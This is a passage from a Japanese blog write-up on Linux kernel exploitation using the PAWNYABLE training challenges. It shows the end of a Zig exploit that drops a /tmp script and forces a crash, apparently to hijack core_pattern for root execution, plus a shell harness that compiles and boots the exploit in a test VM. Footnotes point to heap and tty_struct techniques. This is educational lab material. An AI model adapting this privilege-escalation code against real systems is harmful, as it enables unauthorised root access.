�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mtmpx�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mfs�[0m�[1m�[37m.�[0m�[37mcwd�[0m�[1m�[37m().�[0m�[37mcreateFile�[0m�[1m�[37m(�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m"/tmp/x"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mread�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mtrue�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mmode�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0o777�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[33mcatch�[0m�[1m�[37m �[0m�[33munreachable�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mtmpx�[0m�[1m�[37m.�[0m�[37mwriteAll�[0m�[1m�[37m(�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m\\#!/bin/sh�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m\\/usr/bin/whoami &> /tmp/whoisit�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m\\chmod 777 /tmp/whoisit�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[33mcatch�[0m�[1m�[37m �[0m�[33munreachable�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mtmpx�[0m�[1m�[37m.�[0m�[37mclose�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mfork�[0m�[1m�[37m()�[0m�[1m�[37m �[0m�[33mcatch�[0m�[1m�[37m �[0m�[33munreachable�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mabort�[0m�[1m�[37m(),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37mpid�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mwaitpid�[0m�[1m�[37m(�[0m�[1m�[37mpid�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mflag�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mfs�[0m�[1m�[37m.�[0m�[37mopenFileAbsolute�[0m�[1m�[37m(�[0m�[33m"/tmp/whoisit"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{})�[0m�[1m�[37m �[0m�[33mcatch�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37merr�[0m�[1m�[37m(�[0m�[33m"Failed to open /tmp/whoisit"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mabort�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mdefer�[0m�[1m�[37m �[0m�[1m�[37mflag�[0m�[1m�[37m.�[0m�[37mclose�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mdebug�[0m�[1m�[37m.�[0m�[37mprint�[0m�[1m�[37m(�[0m�[33m"{s}"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{(�[0m�[1m�[37mtmpx�[0m�[1m�[37m.�[0m�[37mreader�[0m�[1m�[37m().�[0m�[37mreadBoundedBytes�[0m�[1m�[37m(�[0m�[1m�[36m32�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[33mcatch�[0m�[1m�[37m �[0m�[33munreachable�[0m�[1m�[37m).�[0m�[37mconstSlice�[0m�[1m�[37m()});�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mexit�[0m�[1m�[37m(�[0m�[1m�[36m0�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mcatchSigsegv�[0m�[1m�[37m(�[0m�[33mcomptime�[0m�[1m�[37m �[0m�[1m�[37mhandler�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36m*�[0m�[33mconst�[0m�[1m�[37m �[0m�[33mfn�[0m�[1m�[37m �[0m�[1m�[37m()�[0m�[1m�[37m �[0m�[1m�[36mvoid�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mwrapper�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m �[0m�[33mfn�[0m�[1m�[37m �[0m�[37mwrapper�[0m�[1m�[37m(�[0m�[1m�[37m_�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mi32�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[37mcallconv�[0m�[1m�[37m(.�[0m�[1m�[37mC�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m �[0m�[37mhandler�[0m�[1m�[37m();�[0m�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m �[0m�[1m�[37m}.�[0m�[1m�[37mwrapper�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37msigact�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mSigaction�[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mhandler�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mhandler�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mwrapper�[0m�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mmask�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mempty_sigset�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mflags�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37msigaction�[0m�[1m�[37m(�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mSIG�[0m�[1m�[37m.�[0m�[1m�[37mSEGV�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37msigact�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36mnull�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mpinThreadToCore�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mpthread�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@cImport�[0m�[1m�[37m({�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[37m@cDefine�[0m�[1m�[37m(�[0m�[33m"_GNU_SOURCE"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m{});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[37m@cInclude�[0m�[1m�[37m(�[0m�[33m"pthread.h"�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m});�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mfn�[0m�[1m�[37m �[0m�[37mpinThreadToCore�[0m�[1m�[37m(�[0m�[1m�[37mthread�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mThread�[0m�[1m�[37m.�[0m�[1m�[37mHandle�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mcore�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mcpu�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mbit_set�[0m�[1m�[37m.�[0m�[37mArrayBitSet�[0m�[1m�[37m(�[0m�[1m�[36musize�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mCPU_SETSIZE�[0m�[1m�[36m*�[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[1m�[36musize�[0m�[1m�[37m)).�[0m�[37minitEmpty�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mcpu�[0m�[1m�[37m.�[0m�[37mset�[0m�[1m�[37m(�[0m�[1m�[37mcore�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37merr�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mpthread�[0m�[1m�[37m.�[0m�[37mpthread_setaffinity_np�[0m�[1m�[37m(�[0m�[37m@ptrCast�[0m�[1m�[37m(�[0m�[1m�[37mthread�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mcpu_set_t�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[37m@ptrCast�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[37m@as�[0m�[1m�[37m(�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mcpu_set_t�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@bitCast�[0m�[1m�[37m(�[0m�[1m�[37mcpu�[0m�[1m�[37m.�[0m�[1m�[37mmasks�[0m�[1m�[37m))));�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[37m@as�[0m�[1m�[37m(�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mE�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@enumFromInt�[0m�[1m�[37m(�[0m�[1m�[37merr�[0m�[1m�[37m)))�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mSUCCESS�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mFAULT�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33munreachable�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mINVAL�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[33merror�[0m�[1m�[37m.�[0m�[1m�[37mInvalidArgument�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mSRCH�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[33merror�[0m�[1m�[37m.�[0m�[1m�[37mProcessNotFound�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37me�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37munexpectedErrno�[0m�[1m�[37m(�[0m�[1m�[37me�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m}).�[0m�[1m�[37mpinThreadToCore�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37mmkdir -p rootfs�[0m�[1m�[37m;�[0m�[1m�[37m �[0m�[37mcd�[0m�[1m�[37m rootfs�[0m
�[1m�[37mcpio -id < ../rootfs.cpio 2>/dev/null�[0m
�[1m�[37mls�[0m
�[37mpushd�[0m�[1m�[37m rootfs�[0m
�[1m�[37mfind . -print0 �[0m�[1m�[37m|�[0m�[1m�[37m cpio --null --format�[0m�[1m�[36m=�[0m�[1m�[37mnewc -o 2>/dev/null > ../rootfs.cpio�[0m
�[37mcd�[0m�[1m�[37m ..�[0m
�[37mset�[0m�[1m�[37m -e�[0m
�[1m�[37m�[0m
�[33mif�[0m�[1m�[37m �[0m�[1m�[36m[�[0m�[1m�[37m ! �[0m�[33m"�[0m�[1m�[36m$libc�[0m�[33m"�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37mtrue�[0m�[1m�[37m �[0m�[1m�[36m]�[0m�[1m�[37m;�[0m�[1m�[37m �[0m�[33mthen�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36mlibc�[0m�[1m�[36m=�[0m�[33m""�[0m�[1m�[37m�[0m
�[33melse�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36mlibc�[0m�[1m�[36m=�[0m�[33m"-lc"�[0m�[1m�[37m�[0m
�[33mfi�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[36minput�[0m�[1m�[36m=�[0m�[33m$(�[0m�[1m�[37mmktemp --suffix�[0m�[1m�[36m=�[0m�[1m�[37m.zig�[0m�[33m)�[0m�[1m�[37m�[0m
�[37mecho�[0m�[1m�[37m �[0m�[33m"�[0m�[1m�[36m$code�[0m�[33m"�[0m�[1m�[37m > �[0m�[1m�[36m$input�[0m�[1m�[37m�[0m
�[1m�[37mzig build-exe �[0m�[1m�[36m$libc�[0m�[1m�[37m -femit-bin�[0m�[1m�[36m=�[0m�[1m�[37mexploit -target x86_64-linux-musl �[0m�[1m�[36m$input�[0m�[1m�[37m�[0m
�[1m�[37mrm exploit.o�[0m
�[1m�[37mrm �[0m�[1m�[36m$input�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37mmv exploit ./rootfs/�[0m
�[33mif�[0m�[1m�[37m �[0m�[1m�[36m[�[0m�[1m�[37m �[0m�[33m"�[0m�[1m�[36m$root�[0m�[33m"�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37mtrue�[0m�[1m�[37m �[0m�[1m�[36m]�[0m�[1m�[37m;�[0m�[1m�[37m �[0m�[33mthen�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36msuid�[0m�[1m�[36m=�[0m�[1m�[36m0�[0m�[1m�[37m�[0m
�[33melse�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36msuid�[0m�[1m�[36m=�[0m�[1m�[36m1337�[0m�[1m�[37m�[0m
�[33mfi�[0m�[1m�[37m�[0m
�[33mif�[0m�[1m�[37m �[0m�[1m�[36m[�[0m�[1m�[37m ! �[0m�[33m"�[0m�[1m�[36m$kaslr�[0m�[33m"�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37mtrue�[0m�[1m�[37m �[0m�[1m�[36m]�[0m�[1m�[37m;�[0m�[1m�[37m �[0m�[33mthen�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[37mexport�[0m�[1m�[37m �[0m�[1m�[36mNOKASLR�[0m�[1m�[36m=�[0m�[1m�[36m1�[0m�[1m�[37m�[0m
�[33mfi�[0m�[1m�[37m�[0m
�[1m�[36mtemp�[0m�[1m�[36m=�[0m�[33m$(�[0m�[1m�[37mmktemp�[0m�[33m)�[0m�[1m�[37m�[0m
�[1m�[37mchmod �[0m�[1m�[36m755�[0m�[1m�[37m �[0m�[1m�[36m$temp�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37mcp rootfs/etc/init.d/S99pawnyable �[0m�[1m�[36m$temp�[0m�[1m�[37m�[0m
�[1m�[37msed -i -E �[0m�[33m"s/(setuidgid) [[:digit:]]+ (sh)/\1 �[0m�[1m�[36m$suid�[0m�[33m \2/"�[0m�[1m�[37m rootfs/etc/init.d/S99pawnyable�[0m
�[33m<<regenerate-rootfs>>�[0m
�[33mmv $temp rootfs/etc/init.d/S99pawnyable�[0m
�[33m�[0m
�[33m./run.sh &�[0m
�[33msleep 2�[0m
�[33m{ echo -n; sleep 1; echo "$shellcmd; exit #^"; } | socat -t 2 -,ignore�[0m�[1m�[37meof UNIX:vm.sock�[0m
もっといいプログラマーになりたいなら、 Recurse Center [13]に応募を考えしろ。
[^fn:1]: 文章にはAIの助けを借りたんだがコードには使ってない。
[^fn:2]: https://elixir.bootlin.com/linux/v5.10.7/source/include/li
nux/tty.h#L285-L345 [14]
[^fn:3]: pwnの文脈に�[40m�[35m`tty_struct`�[39m�[49mを利用するの詳細につてはこちら
[15]やこちら [16]。
[^fn:4]: �[40m�[35m`read`�[39m�[49mや�[40m�[35m`write`�[39m�[49m等
は他のセキュリティー対策 [17]があるらしいので、とりあえず�[40m�[35m`ioctl`�[39m�[49mを利用する。
[^fn:5]: SLUB Internals for Exploit Developers [18]
[^fn:6]: Linux SLUB Allocator Internals and Debugging, Part 1 of 4
[19]
[^fn:7]: https://docs.kernel.org/admin-
guide/mm/userfaultfd.html#creating-a-userfaultfd [20]
[^fn:8]: このページはCC BY 4.0 [21]image [22]image
[23]に免許する、そして全てのeBPFバイトコードはGPLv3 [24]にも免許する。
[^fn:9]: 元々サブプログラムを利用しようとした、でもあれにはbpf_capableの権限は必要だ。
References:
(HTM) [1] PAWNYABLE
(HTM) [2] 出典
(HTM) [3] ptmx_fops
(HTM) [4] core_pattern
(HTM) [5] userfaultfdのハローワールド
(DIR) [6] こち
(HTM) [7] 勉強した
(HTM) [8] chompieさん
(HTM) [9] ptr-yudaiさん
(HTM) [10] PageJack
(HTM) [11] DirtyCred
(HTM) [12] ox-hugo
(HTM) [13] Recurse Center
(HTM) [14] https://elixir.bootlin.com/linux/v5.10.7/source/include/linux/tty.h#L285-L345
(HTM) [15] こちら
(HTM) [16] こちら
(HTM) [17] 他のセキュリティー対策
(HTM) [18] SLUB Internals for Exploit Developers
(HTM) [19] Linux SLUB Allocator Internals and Debugging, Part 1 of 4
(HTM) [20] https://docs.kernel.org/admin-guide/mm/userfaultfd.html#creating-a-userfaultfd
(HTM) [21] CC BY 4.0
(HTM) [22] image
(HTM) [23] image
(HTM) [24] GPLv3
>=================================================================<
(DIR) ブログ
(DIR) Writeups
(DIR) en
copyright 2026 George Huebner
(HTM) email